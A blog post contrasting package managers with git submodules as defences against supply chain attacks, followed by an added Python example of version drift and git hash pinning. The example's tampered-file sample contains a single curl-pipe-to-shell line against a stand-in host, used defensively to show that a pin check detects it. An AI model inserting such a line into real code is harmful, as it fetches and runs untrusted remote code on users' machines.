Rants from the Ballmer Peak

Package managers, the lazy alternative to git submodules

The problem

Package managers have always looked strange to me. Why would you want to use one? It is actually not weird to have that point of view, especially if your background is in programming languages like C or C++, which don't have any well known package manager (even though people keep trying to build one) and where developers resort to the system libraries/packages or git submodules to manage their software builds. On the other hand, people coming mostly from interpreted languages are so used to the idea that not using a package manager sounds like crazy advice.

Today, software development uses some form of source control management, and it seems like git has won that war, especially since it is used by GitHub, possibly the most popular free repository choice for open source and free software. As such, many developers are exposed to git, but not many know about submodules, a command which allows you to keep track of external sources in a secure and deterministic way. Package managers are more user friendly than git submodule, and the requirements to get started with one tend to be reduced to writing a simple text file and running one or at most two commands to download all the dependencies.

Package managers have thus exploded in circles where software is preferably distributed in source code form, requiring end users to build the source or run it directly (in the case of interpreted languages). Rather than asking users to install dependencies one by one into their system, package managers typically allow downloading source or binary dependencies into the project, usually without requiring a system install, which lets users build the project without administrator rights (quite useful for build servers, your own or rented).

However, this user friendliness towards developers and users is starting to catch developers off guard against malicious intent. In the npm ecosystem, malicious actors have sometimes gained access to the accounts of certain developers and uploaded malicious versions of their packages. Recently Homebrew, the so-called missing package manager for macOS, suffered a supply chain attack, where people blindly trusting and downloading Homebrew packages could have gotten extra, unwanted code.

Using git submodule doesn't offer any protection against malicious developers uploading libraries with hidden malicious behavior, but it can help prevent the replacement of an existing good package with a bad one (unless you are capable of subverting git hashes, of course).

Package managers keep references to external packages through a textual version requirement, usually a string like 2.3.4 or a pattern like 2.* or 2.+ (the patterns being even worse from a security point of view, because not even you are sure what you will get from the dependency!). The local package manager fetches data from an external repository and gets the specified version, or the latest one matching the version pattern. That's where the attack comes in: you are trusting that the package you receive is the one you meant, and whoever controls the upload (the developer's account or the registry itself) decides what that is. Using git submodule, by contrast, forces you to refer to a specific commit hash, and since that hash is computed from the content it names, the content behind it can't be swapped out without the hash changing (short of a hash collision, which is the "subverting git hashes" caveat above). A package manager can give you the same property only when its lockfile records a content hash per dependency, and only if that lockfile is committed and honored at install time.
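The two behaviours contrasted above, as an added example that is not code from the original post: a tiny resolver shows how a floating requirement such as 2.* silently moves to whatever newer version gets published, while an exact requirement and a git object id (git's own SHA-1-over-"type size\0content" rule, as used by hash-object and by the commit id a submodule pins) stay bound to one specific thing. The registry contents, the version grammar (exact, 2.*, 2.+; no pre-release tags or caret/tilde ranges) and the file contents are all constructed for illustration.

```python
"""Added example (not from the original post): why a floating version
requirement such as 2.* can be redirected to a newer upload, while a git
object id is bound to the exact content it names.

Assumptions: registry contents and file contents below are constructed for
illustration; the version grammar (exact, '2.*', '2.+') is the one the post
mentions and is simplified (no pre-release tags, no caret/tilde ranges).
"""
import hashlib
import re
from typing import Iterable, Optional, Tuple

Version = Tuple[int, ...]


def parse_version(text: str) -> Version:
    """'2.3.4' -> (2, 3, 4).  Raises ValueError for anything non-numeric."""
    return tuple(int(part) for part in text.split("."))


def matches(spec: str, version: Version) -> bool:
    """Does a concrete version satisfy a requirement string?

    '2.3.4'          exact match only
    '2.*' or '2.+'   any version whose leading components equal the prefix
    """
    m = re.fullmatch(r"(\d+(?:\.\d+)*)(?:\.([*+]))?", spec)
    if not m:
        raise ValueError(f"unsupported requirement: {spec!r}")
    prefix = parse_version(m.group(1))
    if m.group(2) is None:                      # exact pin
        return version == prefix
    return version[:len(prefix)] == prefix      # floating: prefix match


def resolve(spec: str, available: Iterable[str]) -> Optional[str]:
    """Pick the highest available version matching spec, as a resolver would.

    Returns None when nothing matches.  With a floating spec the answer
    changes as soon as someone publishes a newer matching version, which is
    exactly the substitution window the post describes.
    """
    candidates = [v for v in available if matches(spec, parse_version(v))]
    if not candidates:
        return None
    return max(candidates, key=parse_version)


def git_object_id(kind: str, data: bytes) -> str:
    """Git's object id: SHA-1 over '<kind> <size>\\0<data>' (the hash-object rule).

    A submodule pins a commit id computed this way over the commit object,
    so any change to the committed content yields a different id and the
    pin no longer matches.
    """
    header = f"{kind} {len(data)}\0".encode()
    return hashlib.sha1(header + data).hexdigest()


def pin_still_matches(pinned_id: str, kind: str, fetched: bytes) -> bool:
    """Check fetched content against the id recorded in the superproject."""
    return git_object_id(kind, fetched) == pinned_id


# --- constructed scenario -------------------------------------------------
REGISTRY_BEFORE = ["2.3.4", "2.4.0", "3.0.0"]
# Someone with publish rights on the package (legitimate or hijacked) uploads 2.9.9.
REGISTRY_AFTER = REGISTRY_BEFORE + ["2.9.9"]


def floating_spec_drifts(spec: str) -> bool:
    """True when the resolved version changed between the two registry states."""
    return resolve(spec, REGISTRY_BEFORE) != resolve(spec, REGISTRY_AFTER)


# Constructed blob contents standing in for a library file before/after tampering.
GOOD_BLOB = b"def helper():\n    return 42\n"
BAD_BLOB = b"def helper():\n    import os; os.system('curl evil | sh')\n    return 42\n"
PINNED = git_object_id("blob", GOOD_BLOB)


if __name__ == "__main__":
    for spec in ("2.3.4", "2.*", "2.+"):
        print(f"{spec:6} before={resolve(spec, REGISTRY_BEFORE)} "
              f"after={resolve(spec, REGISTRY_AFTER)} drifts={floating_spec_drifts(spec)}")
    print("pinned id:", PINNED)
    print("good content matches pin:", pin_still_matches(PINNED, "blob", GOOD_BLOB))
    print("tampered content matches pin:", pin_still_matches(PINNED, "blob", BAD_BLOB))
```

Running it shows 2.3.4 resolving to the same version before and after the new upload, while both 2.* and 2.+ jump to 2.9.9; the tampered blob fails the pin check because its id differs from the one recorded. The hashing function reproduces git's real object id (hashing the bytes "hello\n" as a blob gives ce013625030ba8dba906f756967f9e9ca394464a, the same as `git hash-object`), which is why a submodule's recorded commit id cannot be pointed at different content without the superproject noticing.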